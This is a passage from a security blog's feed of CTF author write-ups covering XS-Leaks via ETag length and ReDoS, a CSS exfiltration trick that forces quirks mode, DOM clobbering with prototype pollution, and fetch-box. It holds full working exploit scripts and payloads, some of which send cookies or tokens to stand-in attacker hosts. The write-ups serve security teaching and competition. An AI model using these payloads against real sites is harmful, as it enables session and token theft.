      while (16 ** 3 - len - part.length - 1 > 0) {
        const note = prefix.padEnd(
          Math.min(1024, 16 ** 3 - len - part.length - 1),
          "*"
        );
        len += note.length + part.length;
        await createNote(note);
      }
    };

    let win = open("about:blank");

    const getUrl = (prefix, padLength, nonce) =>
      `${BASE_URL}/?${new URLSearchParams({
        query: prefix,
        pad: nonce.padEnd(padLength, "x"),
      })}`;

    const got431 = async (prefix, padLength) => {
      await prepare(prefix);

      const nonce = (Math.random() + "").padEnd(20, "0");
      const url = getUrl(prefix, padLength, nonce);

      const len1 = win.history.length;

      win.location = url;
      await sleep(100);
      win.location = url;
      await sleep(100);
      win.location = "about:blank";
      await sleep(100);
      const len2 = win.history.length;

      const diff = len2 - len1;
      // If a 431 error occurs: diff === 2
      // Otherwise: diff === 3

      if (len2 > 45) {
        // In Chromium, the maximum number of `history.length` is 50.
        // ref. https://source.chromium.org/chromium/chromium/src/+/df9f2fd80f9b8697c877c2c7e7f19d9f389291b8:third_party/blink/public/common/history/session_history_constants.h;l=11
        win.close();
        win = open("about:blank");
        await sleep(100);
      }

      debug({ prefix, len1, len2, diff });
      return diff === 2;
    };

    let left = 10000;
    let right = 18000;
    const getThreshold = async () => {
      left -= 50;
      while (right - left > 1) {
        const mid = (right + left) >> 1;
        if (await got431(known + "X", mid)) {
          right = mid;
        } else {
          left = mid;
        }
      }

      return left;
    };

    while (true) {
      const threshold = await getThreshold();
      debug({ length: known.length, threshold });
      let exists = false;
      for (const c of CHARS) {
        if (await got431(known + c, threshold)) {
          known += c;
          exists = true;
          navigator.sendBeacon("/leak", known);
          break;
        }
      }
      if (!exists) break;
    }

    const flag = known + "}";
    navigator.sendBeacon("/flag", flag);
  </script>
</body>

Full exploit:

Example run:

$ docker run -it --rm \
    -e BOT_BASE_URL=http://impossible-leak.seccon.games:1337 \
    -e CONNECTBACK_URL=http://attacker.example.com \
    -p 8080:8080 \
    (docker build -q ./solution)
Report: 1
[DEBUG] {"prefix":"SECCON{X","len1":0,"len2":3,"diff":3}
[DEBUG] {"prefix":"SECCON{X","len1":3,"len2":5,"diff":2}
[DEBUG] {"prefix":"SECCON{X","len1":5,"len2":8,"diff":3}
...
[DEBUG] {"prefix":"SECCON{X","len1":30,"len2":32,"diff":2}
[DEBUG] {"length":7,"threshold":15799}
[DEBUG] {"prefix":"SECCON{_","len1":32,"len2":35,"diff":3}
[DEBUG] {"prefix":"SECCON{a","len1":35,"len2":38,"diff":3}
[DEBUG] {"prefix":"SECCON{b","len1":38,"len2":41,"diff":3}
[DEBUG] {"prefix":"SECCON{c","len1":41,"len2":44,"diff":3}
[DEBUG] {"prefix":"SECCON{d","len1":44,"len2":47,"diff":3}
[DEBUG] {"prefix":"SECCON{e","len1":0,"len2":3,"diff":3}
[DEBUG] {"prefix":"SECCON{f","len1":3,"len2":6,"diff":3}
[DEBUG] {"prefix":"SECCON{g","len1":6,"len2":9,"diff":3}
[DEBUG] {"prefix":"SECCON{h","len1":9,"len2":12,"diff":3}
[DEBUG] {"prefix":"SECCON{i","len1":12,"len2":15,"diff":3}
[DEBUG] {"prefix":"SECCON{j","len1":15,"len2":18,"diff":3}
[DEBUG] {"prefix":"SECCON{k","len1":18,"len2":21,"diff":3}
{ known: 'SECCON{l' }
[DEBUG] {"prefix":"SECCON{l","len1":21,"len2":23,"diff":2}
[DEBUG] {"prefix":"SECCON{lX","len1":23,"len2":26,"diff":3}
...
{ known: 'SECCON{lu' }
[DEBUG] {"prefix":"SECCON{lu","len1":9,"len2":11,"diff":2}
[DEBUG] {"prefix":"SECCON{luX","len1":11,"len2":14,"diff":3}
[DEBUG] {"prefix":"SECCON{luX","len1":14,"len2":17,"diff":3}
...
{ flag: 'SECCON{lumiose_city}' }

Other Cases

In this writeup, we turned an ETag length difference into an XS-Leak oracle. A closely related variant exists where the oracle relies on a binary state: Does the response have an ETag or not?

Here is an example from a past CTF (as an unintended solution) where this applies:

It is an XS-Leak challenge where HTML injection exists (CSP prevents XSS). However, using the technique described in this article, it becomes solvable even without relying on HTML injection.

In the application, normal pages include an ETag. On the other hand, the GET /search API uses res.end when no results are found, which results in the ETag being omitted entirely. This makes the "ETag presence vs. absence" observable using the same oracle approach described here.

https://github.com/tepel-chen/My-CTF-Challs/blob/main/Full%20Weak%20Engineer%20CTF%202025/Ippon%20Practice%20Tool/attachment/app/index.ts#L172-L180
  const answers = await db.all(
    `SELECT a.id, o.text, a.created_at FROM answer AS a INNER JOIN odai AS o ON a.odai=o.id WHERE owner = ? AND content LIKE ? ESCAPE '\\' ORDER BY created_at DESC `,
    uid,
    `%${escapeLike(q)}%`
  );

  if (answers.length === 0) {
    return res.end("<html><body>Not found. <a href='/'>Home</a></body></html>");
  }

Conclusion

I showed that it is possible to leak the length of an ETag from a cross-site page, turning it into an XS-Leak oracle by leveraging 431 errors and a History API behavior in Chromium.

The ETag header can become a side channel :)

Footnotes

  1. The full list of my SECCON CTF 14 Quals challenges is available here.

  2. Here is parrot's solution for this challenge. It is unintended, but incredibly clever!

]]> CTF <![CDATA[Forcing Quirks Mode with PHP Warnings + CSS Exfiltration without Network Requests]]> https://blog.arkark.dev/2025/09/08/asisctf-quals https://blog.arkark.dev/2025/09/08/asisctf-quals Mon, 08 Sep 2025 00:00:00 GMT I made a web challenge pure-leak for ASIS CTF Quals 2025 as a guest author.

Congrats to MEOW MEOW MEOW MEOW MEOW and Water Paddler for solving it! 🎉

Despite its simplicity, the solution relies on several neat HTML/CSS tricks. Below I'll outline the key ideas and how they fit together.

Challenge Overview

This is a fairly simple XS-Leaks challenge (but, "simple" doesn't mean "easy").

The server-side code is written in PHP:

web/index.php
<?php
function validate(mixed $input): string {
  if (!is_string($input)) return "Invalid types";
  if (strlen($input) > 1024) return "Too long";
  if (preg_match('/[^\x20-\x7E\r\n]/', $input)) return "Invalid characters";
  if (preg_match('*http|data|\\\\|\*|\[|\]|&|%|@|//*i', $input)) return "Invalid keywords";
  return $input;
}
?>
<!DOCTYPE html>
<html>
<body>
  <h1>pure-leak 🫨</h1>
  <h3>Source</h3>
  <pre><?php echo htmlspecialchars(file_get_contents(__FILE__)); ?></pre>
  <h3>Content</h3>
  <?php echo validate($_GET["content"] ?? "{{ your_input }}")."\n"; ?>
  <h3>Token</h3>
  <?php echo htmlspecialchars($_COOKIE["TOKEN"] ?? "TOKEN_0123456789abcdef"); ?>
  <h3>Usage</h3>
  <a href="/?content=your_input">/?content=your_input</a>
</body>
</html>

The following line has an obvious HTML injection vulnerability via the content query parameter:

<?php echo validate($_GET["content"] ?? "{{ your_input }}")."\n"; ?>

A Caddy reverse proxy is used for load balancing and adding CSP header:

web/entrypoint.sh
#!/bin/sh
set -eu

# load balancing
php -S 127.0.0.1:9000 &
php -S 127.0.0.1:9001 &
php -S 127.0.0.1:9002 &
php -S 127.0.0.1:9003 &

cat > /tmp/Caddyfile << EOF
:3000 {
  header {
    defer
    Content-Security-Policy "script-src 'none'; default-src 'self'; base-uri 'none'"
  }

  reverse_proxy 127.0.0.1:9000 127.0.0.1:9001 127.0.0.1:9002 127.0.0.1:9003 {
    replace_status 200
  }
}
EOF

exec caddy run --config /tmp/Caddyfile

The challenge overview is as follows:

  • Goal
    • Steal the admin token: $_COOKIE["TOKEN"]
  • Rules:
    • You can inject HTML via $_GET["content"]
    • Token format: TOKEN_[0-9a-f]{16}
    • The application runs on PHP's built-in server behind Caddy
  • Limitations:
    • Validation for $_GET["content"]:
      • Type: string
      • Length limit: 1024
      • Allowed characters: [\x20-\x7e\r\n]
      • Disallowed substrings (case-insensitive):
        • http, data, \, *, [, ], &, %, @, //
    • CSP: script-src 'none'; default-src 'self'; base-uri 'none'
    • Admin bot's timeout: 20 seconds
      • It's relatively short for XS-Leaks challenges

Solution

Step 1: Forcing Quirks Mode with PHP Warnings

One of the naive plans for this CSP is CSS data exfiltration:

Content-Security-Policy: script-src 'none'; default-src 'self'; base-uri 'none'

In general, a <link href="..." rel="stylesheet"> only loads stylesheets if the response's Content-Type is text/css.

Spec:

To process this type of linked resource given a link element el, boolean success, response response, and byte sequence bodyBytes:

  1. If the resource's Content-Type metadata is not text/css, then set success to false.
  2. ...

Source: https://html.spec.whatwg.org/multipage/links.html#link-type-stylesheet

Under default-src 'self', there's no same-origin endpoint that returns text/css, so CSS injection likely doesn't work.

However, there's an important exception. Quirks mode relaxes the MIME check for same-origin!

Quirk: If the document has been set to quirks mode, has the same origin as the URL of the external resource, and the Content-Type metadata of the external resource is not a supported style sheet type, the user agent must instead assume it to be text/css.

info

As a related note, the traditional attack called Relative Path Overwrite (RPO) requires the page to be in quirks mode. This requirement stems from the MIME-check relaxation mentioned above.

Now, look at index.php. It emits <!DOCTYPE html> at the beginning, so the page is in no-quirks mode, not quirks mode, and the MIME-check relaxation doesn't apply.

document.compatMode === "CSS1Compat" means the page is in no-quirks mode. So, CSS loading appears impossible... Really?

Last year, pilvar showed a novel CSP bypass technique using PHP warnings:

PHP emits a warning message when the number of query parameters exceeds the max_input_vars threshold (default: 1000). Even if the application later calls header(...), part of the body has already been sent, so the CSP header will not be added.

In this challenge, it's impossible to drop CSP header because it's added by Caddy. However, can we adapt this technique to change quirks/no-quirks mode?

The answer is yes. If we trigger the warning before <!DOCTYPE html> is sent, the page enters quirks mode. That's exactly what we want.

Example:

http://localhost:3000/?a&a&a&a&a&a&a&a&a&a&a&...<1001 parameters>...

document.compatMode === "BackCompat" means the page is in quirks mode.

At this point, same-origin CSS loading becomes possible even without a text/css MIME type.

Step 2: Using 404 Error Pages as a CSS Injection Sink

Now, can we simply load /index.php?content=<css payload> as a stylesheet?

const content = `
  <link href="/index.php?content={}body{background:limegreen}" rel=stylesheet>
`;
location = `http://localhost:3000?content=${
  encodeURIComponent(content)
}${"&a".repeat(1000)}`;

The answer is no. Before the HTML injection point, the page contains /*, so the payload lands inside a CSS comment. Because using * is disallowed by validation, we can't close the comment.

We need an endpoint where we control raw text without landing inside a comment.

Conveniently, PHP's built-in 404 page includes the requested URL in the response body. We can leverage it for CSS injection.

In fact, the CSS injection works at /not-found.txt?{}body{background:limegreen}:

const content = `
  <link href="/not-found.txt?{}body{background:limegreen}" rel=stylesheet>
`;
location = `http://localhost:3000?content=${
  encodeURIComponent(content)
}${"&a".repeat(1000)}`;

Step 3: CSS Injection without Attribute Selectors

A classic CSS exfiltration payload looks like:

input[value^="TOKEN_012"] {
  background-image: url(http://attacker.example.com/?orefix=TOKEN_012);
}

But, we can't use this payload here due to:

  • Issue 1: [ and ] are banned
    • → Using attribute selectors are disallowed.
  • Issue 2: CSP includes default-src 'self'
    • → Using external requests are disallowed (so url(...) leaks don't work).

For Issue 1, we can emulate attribute checks using a :valid pseudo-class and an <input>'s pattern attribute:

Example (with Dangling Markup Injection):

const pattern = "TOKEN_012";
const content = `
  <link href="/not-found.txt?{}div:has(input:valid){background:limegreen}" rel=stylesheet>
  <div>
    <input pattern=".+${pattern}.+" value="
`;
location = `http://localhost:3000?content=${
  encodeURIComponent(content)
}${"&a".repeat(1000)}`;

Rendered HTML:

Match (pattern=".+TOKEN_012.+"):

Miss (pattern=".+TOKEN_01a.+"):

Step 4: CSS Exfiltration without Network Request via Frame Counting

We still need to address Issue 2 (we can't use url(...) due to default-src 'self').

Now, I'd like to introduce a useful technique with frame counting trick:

As an important fact, <embed> (or <object>) increments window.length unless it's hidden with display: none.

No style applied → window.length === 1:

CSS with display:none applied → window.length === 0:

This yields a stable and fast oracle without any external requests:

const win = open("");

const match = async (pattern) => {
  win.location = "about:blank";
  await sleep(100);

  const content = `
    <link href="/not-found.txt?{}div:has(input:valid){display:none}" rel=stylesheet>
    <div>
      <embed code="x" type=text/html>
      <input pattern=".+${pattern}.+" value="
  `;
  const url = `${BASE_URL}?content=${encodeURIComponent(
    content
  )}${"&a".repeat(1000)}`;

  win.location = url;
  await sleep(100);

  return win.length === 0; // frame counting
};

// Check the prefix of a token
const result = await match("TOKEN_123");

Putting It All Together

The final exploit looks like this:

<body>
  <script type="module">
    const BASE_URL = "http://web:3000";

    const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

    const TOKEN_SIZE = 16;

    let known = "TOKEN_";
    const win = open("");

    const CHARS = [..."0123456789abcdef"];

    const match = async (pattern) => {
      win.location = "about:blank";
      while (true) {
        try {
          win.origin;
          break;
        } catch {
          await sleep(3);
        }
      }

      const content = `
        <link href="/not-found.txt?{}div:has(input:valid){display:none}" rel=stylesheet>
        <div>
          <embed code="x" type=text/html>
          <input pattern=".+${pattern}.+" value="
      `;
      const url = `${BASE_URL}?content=${encodeURIComponent(
        content
      )}${"&a".repeat(1000)}`; // PHP warnings

      win.location = url;
      while (true) {
        try {
          win.origin;
          await sleep(3);
        } catch {
          break;
        }
      }
      await sleep(100);

      return win.length === 0; // frame counting
    };

    for (let i = 0; i < TOKEN_SIZE; i++) {
      // binary search
      let left = 0;
      let right = CHARS.length;
      while (right - left > 1) {
        const mid = (right + left) >> 1;

        const p = "(" + CHARS.slice(left, mid).join("|") + ")";
        if (await match(known + p)) {
          right = mid;
        } else {
          left = mid;
        }
      }
      known += CHARS[right - 1];
      navigator.sendBeacon("/debug", known);
    }

    navigator.sendBeacon("/token", known);
  </script>
</body>

Full exploit:

Example run:

$ docker run -it --rm \
    -e BOT_BASE_URL=http://pure-leak.asisctf.com:1337 \
    -e CONNECTBACK_URL=http://attacker.example.com \
    -p 8080:8080 \
    (docker build -q ./solution)
(node:1) [FSTWRN003] FastifyWarning: The listen method mixes async and callback styles that may lead to unhandled rejections. Please use only one of them.
(Use `node --trace-warnings ...` to show where the warning was created)
[DEBUG] TOKEN_6
[DEBUG] TOKEN_62
[DEBUG] TOKEN_629
[DEBUG] TOKEN_6290
[DEBUG] TOKEN_6290e
[DEBUG] TOKEN_6290e5
[DEBUG] TOKEN_6290e54
[DEBUG] TOKEN_6290e546
[DEBUG] TOKEN_6290e5469
[DEBUG] TOKEN_6290e54698
[DEBUG] TOKEN_6290e546987
[DEBUG] TOKEN_6290e546987d
[DEBUG] TOKEN_6290e546987d4
[DEBUG] TOKEN_6290e546987d4e
[DEBUG] TOKEN_6290e546987d4e0
[DEBUG] TOKEN_6290e546987d4e0d
{
  token: 'TOKEN_6290e546987d4e0d',
  flag: 'ASIS{silksooooooong_9_4_y4y!!}'
}
]]> CTF <![CDATA[AlpacaMark: DOM Clobbering with Prototype Pollution and iframe's credentialless Trick]]> https://blog.arkark.dev/2025/05/30/alpaca-mark https://blog.arkark.dev/2025/05/30/alpaca-mark Fri, 30 May 2025 00:00:00 GMT This is a writeup for AlpacaMark, a challenge I created for AlpacaHack Round 11 (Web). Due to an unintended solution, I released a revised version called "AlpacaMark Revenge" after the CTF.

Result:

Congratulations to icesfont for the first blood!

Keywords:

  • DOM Clobbering
  • Prototype Pollution
  • iframe's credentialless attribute

Links:

Overview

The goal of this client-side challenge is to achieve XSS.

The server-side code is quite simple:

server/index.js
const app = express();

app
  .use(express.static("dist"))
  .set("view engine", "ejs")
  .set("views", "server/views");

app.get("/", (req, res) => {
  const nonce = crypto.randomBytes(16).toString("base64");
  res.setHeader(
    "Content-Security-Policy",
    `script-src 'strict-dynamic' 'nonce-${nonce}'; default-src 'self'; base-uri 'none'`
  );

  const markdown = req.query.markdown?.slice(0, 512) ?? DEFAULT_MARKDOWN;
  if (/<script/i.test(markdown)) {
    return res.status(400).send(":(");
  }

  res.render("index", {
    nonce,
    markdown,
  });
});

app.listen(3000);

The application uses EJS, and the markdown parameter is inserted without escaping, leading to an obvious HTML injection vulnerability:

server/views/index.html
<textarea name="markdown" required><%- markdown %></textarea>

However, there's the following CSP:

script-src 'strict-dynamic' 'nonce-${nonce}'; default-src 'self'; base-uri 'none'

Client-side static files (JavaScript/CSS) are bundled using Rspack:

rspack.config.js
import { defineConfig } from "@rspack/cli";

export default defineConfig({
  entry: {
    main: "./client/index.js",
  },
  experiments: {
    css: true,
  },
  devtool: false,
});

The client-side JavaScript uses can-deparam. This library has a known Prototype Pollution vulnerability, which will be key to our exploit:

client/index.js
const markdown =
  localStorage.getItem("markdown") ??
  (await import("can-deparam").then(
    ({ default: deparam }) => deparam(location.search.slice(1)).markdown ?? ""
  ));
localStorage.setItem("markdown", markdown);

Solution

Step 1: DOM Clobbering with Prototype Pollution

Vulnerabilities related to DOM Clobbering gadgets have recently been reported in several libraries. Examples include:

Rspack, used in this challenge, is one such library.

info

The reporter of the above CVEs has created a repository collecting DOM Clobbering gadgets:

In Rspack, when using dynamic imports, scripts are loaded from URLs based on document.currentScript.src:

if (document.currentScript)
  scriptUrl = document.currentScript.src;

However, if you could inject HTML like the following, it would allow arbitrary script loading, leading to XSS:

<img name="currentScript" src="https://attacker.example/" />

To mitigate this DOM Clobbering attack, the following check was added:

if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT')
  scriptUrl = document.currentScript.src;

This challenge uses Rspack version 1.3.9, which includes this fix.

Can this DOM Clobbering countermeasure be bypassed?

Yes, it can be bypassed if a Prototype Pollution vulnerability exists!

Specifically, you can bypass it by injecting HTML like this:

<iframe name=currentScript srcdoc="
<script>
// Prototype Pollution
({}).__proto__.tagName = 'SCRIPT';
({}).__proto__.src = 'https://attacker.example/';
</script>
"></iframe>

In this case, document.currentScript.tagName will evaluate to "SCRIPT".

In practice, you need to wait for the iframe's content to render. This can be achieved by delaying the main script execution until the iframe's content is rendered, for example, by using multiple <link rel=stylesheet> tags to block rendering:

<iframe name=currentScript srcdoc="
<script>
({}).__proto__.tagName = 'SCRIPT';
({}).__proto__.src = 'https://attacker.example/';
</script>
"></iframe>
<link rel=stylesheet href=/0>
<link rel=stylesheet href=/1>
<link rel=stylesheet href=/2>
<link rel=stylesheet href=/3>
<link rel=stylesheet href=/4>
<link rel=stylesheet href=/5>
<link rel=stylesheet href=/6>

Step 2: iframe's credentialless Trick

Considering Step 1, you might think that reporting a URL like the one below would achieve XSS:

const CONNECTBACK_URL = "https://attacker.example";

const markdown = `
</textarea>
<iframe name=currentScript src="/?__proto__[tagName]=SCRIPT&__proto__[src]=data:,location='${CONNECTBACK_URL}/'%2bdocument.cookie//"></iframe>
<link rel=stylesheet href=/0>
<link rel=stylesheet href=/1>
<link rel=stylesheet href=/2>
<link rel=stylesheet href=/3>
<link rel=stylesheet href=/4>
<link rel=stylesheet href=/5>
<link rel=stylesheet href=/6>
<textarea>
`.trim();

const url = `http://alpaca-mark:3000?${new URLSearchParams({ markdown })}`;
console.log(url);
// Report this URL to the admin bot.

However, there's another hurdle in this challenge.

client/index.js
const markdown =
  localStorage.getItem("markdown") ??
  (await import("can-deparam").then(
    ({ default: deparam }) => deparam(location.search.slice(1)).markdown ?? ""
  ));
localStorage.setItem("markdown", markdown);

This web service behaves as follows:

  • On the first visit:
    1. Parses the URL query using the can-deparam library.
    2. Retrieves the value of the markdown query parameter.
    3. Saves it to localStorage.
  • On subsequent visits:
    1. Retrieves the markdown value from localStorage.

Since can-deparam is not used on subsequent visits, Prototype Pollution won't occur. This means that with the DOM Clobbering payload above, properties cannot be polluted inside the iframe.

Is there a way to enable Prototype Pollution inside the iframe?

Yes, the iframe's credentialless attribute comes to the rescue! This attribute isolates the iframe's localStorage from the parent document's localStorage.

info

HTMLIFrameElement: credentialless property

Those contexts do not have access to their network, cookies and storage data associated with their origin. Instead, they use new ones, local to the top-level document lifetime.

Source: https://developer.mozilla.org/en-US/docs/Web/API/HTMLIFrameElement/credentialless

I tested the behavior in Chrome:

In the credentialless iframe ifr2, localStorage.getItem("test") is null.

Therefore, by adding the credentialless attribute to the iframe, the attack becomes successful!

const CONNECTBACK_URL = "https://attacker.example";

const markdown = `
</textarea>
<iframe name=currentScript src="/?__proto__[tagName]=SCRIPT&__proto__[src]=data:,location='${CONNECTBACK_URL}/'%2bdocument.cookie//" credentialless></iframe>
<link rel=stylesheet href=/0>
<link rel=stylesheet href=/1>
<link rel=stylesheet href=/2>
<link rel=stylesheet href=/3>
<link rel=stylesheet href=/4>
<link rel=stylesheet href=/5>
<link rel=stylesheet href=/6>
<textarea>
`.trim();

const url = `http://alpaca-mark:3000?${new URLSearchParams({ markdown })}`;
console.log(url);
// Report this URL to the admin bot.

Solver

My entire solver can be found here:

]]> CTF <![CDATA[ASIS CTF Finals 2024: Author Writeups]]> https://blog.arkark.dev/2024/12/30/asisctf-finals https://blog.arkark.dev/2024/12/30/asisctf-finals Mon, 30 Dec 2024 00:00:00 GMT Thank you for playing ASIS CTF Finals 2024!

There were 7 web challenges and the authors are @maple3142, @Strellic_, @_splitline_, @kevin_mizu, @_Worty, and me.

I made 2 challenges:

ChallengeCategoryIntended DifficultySolvedKeywords
fetch-boxweb, misceasy19fetch, sandbox
fire-leakwebmedium-hard1XS-Leak, ReDoS

You can see the source code and author's solvers at my-ctf-challenges repository.

[web, misc] fetch-box

Description:

A client-side sandbox challenge!

  • Challenge: http://fetch-box.asisctf.com:3000
  • Admin bot: http://fetch-box.asisctf.com:1337

Overview

In this challenge, an HTTP request whose URL includes a flag is periodically sent by fetch. The goal is to steal the flag value in the URL:

web/index.html
<!DOCTYPE html>
<body>
  <h1>XSS Playground</h1>
  <script>
    (() => {
      const flag = localStorage.getItem("flag") ?? "🚩";
      localStorage.removeItem("flag");

      const fetch = Object.freeze(window.fetch);
      const resource = `/ping?${new URLSearchParams({ flag })}`;
      const options = Object.create(null);

      const fun = () => fetch(resource, options);
      setInterval(fun, 500);
    })();

    const params = new URLSearchParams(location.search);
    const xss = params.get("xss") ?? "console.log(1337)";
    setTimeout(xss, 800);
  </script>
</body>

There is an obvious XSS vulnerability with xss parameter.

Also, the CSP is base-uri 'none'; frame-ancestors 'none'.

web/index.js
import express from "express";
import fs from "node:fs";

const html = fs.readFileSync("index.html", { encoding: "utf8" });

express()
  .use("/", (req, res, next) => {
    res.setHeader(
      "Content-Security-Policy",
      "base-uri 'none'; frame-ancestors 'none'"
    );
    next();
  })
  .get("/", (req, res) => res.type("html").send(html))
  .get("/ping", (req, res) => res.type("text").send("pong"))
  .listen(3000);

Solution

First of all, is there any way to cause an error when executing the fetch?

A simple way is to access a URL containing an authority:

  • e.g. http://foobar@fetch-box.asisctf.com:3000

Uncaught (in promise) TypeError: Failed to execute 'fetch' on 'Window': Request cannot be constructed from a URL that includes credentials: /ping?flag=%F0%9F%9A%A9

Then, an uncaught error occurs and the promise rejection is not handled. This means an unhandledrejection event is emitted:

Since the error message includes the requested URL, you can get the flag value using addEventListener("unhandledrejection", ...).

Solver

const CONNECTBACK_URL = "http://attacker.example.com";

const xss = `
window.addEventListener(
  "unhandledrejection",
  (event) => {
    navigator.sendBeacon("${CONNECTBACK_URL}", event.reason);
  },
  { once: true }
);
`.trim();

const url = `http://foobar@web:3000?${new URLSearchParams({ xss })}`;
// If you report this URL, you will get a flag.

Unintended Solutions

There were three unintended solutions. I wonder if nobody has solved fetch-box using the intended solution, but all the solutions are valid and interesting.

Using Performance APIs

const url = performance.getEntries().find(e => e.initiatorType === "fetch").name;
console.log(url); // -> http://fetch-box.asisctf.com:3000/ping?flag=ASIS%7BREDACTED%7D

You can get the requested URL from a PerformanceNavigationTiming instance triggered by executing fetch.

Adding a <meta> element with CSP

From: https://x.com/tyage/status/1873537456920002982

window.addEventListener('securitypolicyviolation', (e) => {
  navigator.sendBeacon('https://.../', e.blockedURI);
});
document.head.innerHTML = `<meta http-equiv="content-security-policy" content="connect-src https://.../">`;

You can get the requested URL from a CSP error with connect-src.

Prototype Pollution to thenable objects

From: https://nanimokangaeteinai.hateblo.jp/entry/2024/12/30/065058

Object.prototype.then = function () { console.log(this.url) }

You can access the local variables by polluting then property.

[web] fire-leak

Description:

It's time to leak quickly.

  • Challenge: http://fire-leak.asisctf.com:3000
  • Admin bot: http://fire-leak.asisctf.com:1337

Overview

This is a simple XS-Leak challenge.

A part of web/index.js
app.get("/", (req, res) => {
  const html = String(req.query.html ?? defaultHtml);

  if (html.length > 1024) return res.send("?");
  if (/[^\x20-\x7e\r\n]/i.test(html)) return res.send("??");
  if (/meta|link|src|data|href|svg|:|%|&|\\|\/\//i.test(html)) return res.send("???");

  res
    .type("html")
    .setHeader(
      "Content-Security-Policy",
      "default-src 'none'; base-uri 'none'; frame-ancestors 'none'"
    )
    .send(html.replace("{{TOKEN}}", req.cookies.TOKEN));
});
  • Goal:
    • To steal an admin token: req.cookies.TOKEN
  • Rules:
    • A given HTML is rendered.
    • {{TOKEN}} in the HTML is once replaced with the token.
    • The token's format is 6-bytes hex string ([0-9a-f]{12}).
  • Limitations:
    • For the html parameter:
      • Length limit: 1024
      • Allowed characters: [\x20-\x7e\r\n]
      • Disallowed substring (case-insensitive):
        • meta, link, src, data, href, svg, :, %, &, \, //
    • CSP: default-src 'none'; base-uri 'none'; frame-ancestors 'none'

A new token is issued each time a URL is reported to the admin bot.

// Issue a new token
const page1 = await context.newPage();
await page1.goto(APP_URL + "/save-flag", { timeout: 3_000 });
await sleep(2_000);
await page1.close();

// Visit a given URL
const page2 = await context.newPage();
await page2.goto(url, { timeout: 5_000 });
await sleep(60_000);
await page2.close();

⚠️ This means you need to steal the token within 60 seconds. For reference, my solution only requires about 30 seconds.

Solution

The CSP and the html parameter's limitations prevent typical XS-Leak techniques. On the condition, are there useful HTML elements and/or attributes to construct an oracle?

My solution used <input pattern="..." value="...">.

The pattern attribute specifies a regular expression for the input validation. It seems useful for XS-Leak with ReDoS.

For example:

<input
  type="text"
  pattern=".*(.?){12}[abcd]beaf"
  value="xxxxx...snip...xxxxx{{TOKEN}}"
>

This validation works as follows:

  • If the token matches with ^.*[abcd]beaf$, the validation process is not heavy.
  • Otherwise, the validation process is heavy.

However, there is a big(?) problem:

  • You need to construct a stable oracle to ensure the leak process completes within 60 seconds.
  • An XS-Leak depending on the browser's busy state tends to be unstable and takes a long time.

To address this, I added an <iframe> element and used the frame counting technique:

<input
  type="text"
  pattern=".*(.?){12}[abcd]beaf"
  value="xxxxx...snip...xxxxx{{TOKEN}}"
>
<iframe></iframe>

I measured how long it takes for the window.length value to change. As a result, I found that it is possible to reliably observe differences in the time required to evaluate a regular expression.

Solver

<body>
  <script type="module">
    // http://web:3000
    const BASE_URL = new URLSearchParams(location.search).get("baseUrl");

    const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));

    const waitFor = async (f) => {
      while (true) {
        if (await f()) return;
        await sleep(3);
      }
    };

    const win = open("about:blank");

    const measure = async (pattern) => {
      win.location = "about:blank";
      await waitFor(() => win.length === 0);
      await sleep(100);

      const pad = "x".repeat(100);
      const html = `
        <input type="text" pattern="${pattern}" value="${pad}{{TOKEN}}">
        <iframe></iframe>
      `.trim();
      const url = `${BASE_URL}?${new URLSearchParams({ html })}`;

      win.location = url;
      await waitFor(() => {
        try {
          win.origin;
          return false;
        } catch {
          return true;
        }
      });
      const start = performance.now();
      await waitFor(() => win.length === 1);
      const time = performance.now() - start;

      return time;
    };

    const search = async (known) => {
      const CHARS = "0123456789abcdef";
      const W = 12;

      // Binary Search
      let left = 0;
      let right = CHARS.length;
      while (right - left > 1) {
        const mid = (right + left) >> 1;

        const timeL = await measure(`.*(.?){${W}}[${CHARS.slice(left, mid)}]${known}`);
        const timeR = await measure(`.*(.?){${W}}[${CHARS.slice(mid, right)}]${known}`);

        if ((Math.min(timeL, timeR) + 10) * 4 > Math.max(timeL, timeR)) {
          // retry
          await sleep(2000);
          continue;
        }

        if (timeL < timeR) {
          right = mid;
        } else {
          left = mid;
        }
      }

      return CHARS.slice(left, right);
    };

    const main = async () => {
      let known = "";
      for (let i = 0; i < 6 * 2; i++) {
        known = (await search(known)) + known;
        navigator.sendBeacon("/debug", JSON.stringify({ i, known }));
      }
      navigator.sendBeacon("/token", known);
    };
    main();
  </script>
</body>
]]> CTF <![CDATA[AlpacaHack Round 7 (Web) - 作問者writeup]]> https://blog.arkark.dev/2024/12/01/alpacahack-round-7 https://blog.arkark.dev/2024/12/01/alpacahack-round-7 Sun, 01 Dec 2024 00:00:00 GMT AlpacaHackは個人戦のCTFを継続して開催する新しいCTFプラットフォームです。今回はst98さんと一緒にWeb回であるRound 7の作問を、担当しました。ご参加いただいた方々、ありがとうございました。

AlpacaHackにはwriteupを投稿する機能があるので、ぜひwriteupを書いて投稿してみてください。upsolveもOKです。AlpacaHackは常設CTFでもあるので、終わったCTFも実際にリモート環境でテストすることが可能です!

さて、今回は以下の問題をつくりました。本記事はそのwriteupになります。

ChallengeCategoryKeywordsSolved
Treasure HuntwebURL encoding71
minimal-wafwebXSS4
disconnectionwebbrowser behavior5
disconnection-revengewebbrowser behavior1

コンテスト開始早々にdisconnectionの問題で非想定解法が見つかったため、リベンジ問としてdisconnection-revengeを出題しました。disconnection/disconnection-revengeの解説は別記事として投稿する予定なので、少々お待ちください。

Treasure Hunt

問題文:

Can you find a treasure?

  • Attachments: treasure-hunt.tar.gz

問題概要

web/Dockerfile
# Create flag.txt
RUN echo 'Alpaca{REDACTED}' > ./flag.txt

# Move flag.txt to $FLAG_PATH
RUN FLAG_PATH=./public/$(md5sum flag.txt | cut -c-32 | fold -w1 | paste -sd /)/f/l/a/g/./t/x/t \
    && mkdir -p $(dirname $FLAG_PATH) \
    && mv flag.txt $FLAG_PATH

以下のような、フラグのハッシュ値を/で位置文字ずつ区切られたパスにフラグファイルが置かれています。

./public/3/8/7/6/9/1/7/c/b/d/1/b/3/d/b/1/2/e/3/9/5/8/7/c/6/6/a/c/2/8/9/1/f/l/a/g/t/x/t
web/index.js
import express from "express";

const html = `
<h1>Treasure Hunt 👑</h1>
<p>Can you find a treasure?</p>
<ul>
  <li><a href=/book>/book</a></li>
  <li><a href=/drum>/drum</a></li>
  <li><a href=/duck>/duck</a></li>
  <li><a href=/key>/key</a></li>
  <li><a href=/pen>/pen</a></li>
